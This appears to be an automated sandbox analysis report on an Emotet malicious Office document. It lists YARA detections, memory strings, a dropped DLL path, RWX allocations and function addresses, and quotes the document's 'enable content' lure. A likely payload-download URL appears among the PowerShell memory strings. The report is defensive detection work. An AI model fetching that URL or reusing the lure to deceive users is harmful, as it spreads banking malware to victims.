                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/
                      Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2112160359.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2106310017.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099609589.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2106250328.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2112213482.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099871520.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099349373.0000000000240000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2110427728.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2102360231.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2110654197.0000000000750000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2111292152.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2101833824.0000000000230000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2340125586.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2110403391.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2112133272.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.750000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.b10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.990000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.770000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.b10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.7b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.750000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.990000.1.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 8,758 N@m 13 ;a 1009
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Kaktksw\An6othh\N49I.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5677
                      Source: unknownProcess created: Commandline size = 5576
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5576
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00771328 NtSetInformationKey,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Xsugi\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00257D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002589F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00247E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00258831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00247605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00248816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00258668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00254E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00251259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00248CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002456B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00255AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00254693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00249AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002542E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002494EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002506C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00249CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00255115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00258F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00252965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00250F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00251B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00257570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00253D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00256B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00243D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002599A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00255DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002537F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00246BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002573C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002577C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00259DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002593C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0027303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00281E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00523856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00519055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052C014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052C83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005210E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052D099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051C0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005210BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005260B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00514152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00515155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052A972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00516134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00526934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051C9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052B998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052E985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051D1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00518A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00518217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00525AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005132C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005232F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005272F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00526AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052D2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052C340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00516B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00512362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052E32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00527BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00510BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00511B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005243BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005173A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052D45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051BC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00523C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052BC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00514C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005284D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00525CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005204E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052B499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051C485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00526D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052B5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00514DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051B5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051ED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051C587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00517D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005185B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005165BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00527DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00519DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00519DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051C652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00521ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00513E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00524689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005116B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052A746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0051577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00527F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0052D713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00528F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00513F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00243D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00247D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002437F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002489F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002493C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00232628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00248831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00238816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00248668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00244E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00235856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00231658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00241259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00238CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002356B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00235EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00245AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00244693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002442E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002394EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002406C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00245115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00248F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00242965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00240F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00247570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00241B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00246B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00233D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002499A4
